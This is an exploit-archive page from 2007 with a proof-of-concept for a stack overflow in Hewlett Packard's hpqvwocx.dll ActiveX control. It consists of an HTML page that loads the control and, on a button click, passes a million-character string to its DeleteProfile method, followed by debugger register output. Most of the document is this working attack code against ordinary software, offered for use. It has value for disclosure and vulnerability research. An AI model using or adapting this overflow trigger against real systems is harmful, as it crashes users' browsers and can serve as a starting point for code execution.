Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC
# Published : 2007-05-11
# Author : callAX
# Previous Title : PrecisionID Barcode ActiveX 1.3 Denial of Service Exploit
# Next Title : Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit

<html>

<head>

 <title>

  Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309

 </title>

</head>

 

<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>

Tested in Windows XP Service Pack 2<br>

Discovered by Goodfellas Security Research Team<br>

Url ->http://www.hp.com<br> author -> callAX<br>mail -> callax@shellcode.com.ar<br>

http://www.shellcode.com.ar / http://www.securenetworks.ch</h4>

 

<object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='pAF' ></object>

 

<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">

 

<script language="VBScript">

 

sub OuCh()

 

 Var_0 = String(1000000, "A")

 

 pAF.DeleteProfile Var_0

 

End Sub

 

 

</script>

 

</html>

 

<!--

 

Tested in OllyDBG 1.08b

 

TEST DWORD PTR DS:[ECX],EAX

 

EAX -> 000ED484

ECX -> 000425F4

EDX -> 00000000

EBX -> 00000000

EIP  -> 04B47B97

 

Sub DeleteProfile (

            ByVal Name  As String

)

 

-->

# www.Syue.com [2007-05-11]